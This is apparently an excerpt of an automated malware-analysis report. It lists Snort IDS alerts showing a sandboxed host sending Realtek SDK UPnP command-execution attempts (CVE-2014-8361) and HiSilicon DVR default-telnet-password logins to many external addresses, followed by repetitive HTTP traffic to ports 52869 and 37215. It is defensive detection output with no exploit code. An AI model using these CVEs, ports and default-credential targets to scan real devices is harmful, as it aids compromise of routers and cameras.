Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58544 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32974
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38636 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58830 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58120 -> 178.72.106.93:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43234 -> 91.76.197.73:52869

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
